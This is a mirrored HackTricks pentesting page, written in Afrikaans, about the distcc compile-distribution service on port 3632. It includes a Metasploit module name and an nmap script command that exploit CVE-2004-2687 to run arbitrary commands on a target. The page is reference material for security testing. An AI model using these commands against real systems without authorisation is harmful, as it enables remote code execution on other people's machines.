mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
1.2 KiB
1.2 KiB
{{#include ../banners/hacktricks-training.md}}
Basiese Inligting
Distcc is 'n hulpmiddel wat die kompilasieproses verbeter deur die onbenutte verwerkingskrag van ander rekenaars in die netwerk te benut. Wanneer distcc op 'n masjien opgestel is, is hierdie masjien in staat om sy kompilasietake na 'n ander stelsel te versprei. Hierdie ontvangerstelsel moet die distccd daemon draai en moet 'n kompatible kompileerder geïnstalleer hê om die gestuurde kode te verwerk.
Standaard poort: 3632
PORT STATE SERVICE
3632/tcp open distccd
Exploitatie
Kontroleer of dit kwesbaar is vir CVE-2004-2687 om arbitrêre kode uit te voer:
msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"
Shodan
Ek dink nie shodan detecteer hierdie diens nie.
Resources
- https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec
- https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855
Post geskep deur Álex B (@r1p)
{{#include ../banners/hacktricks-training.md}}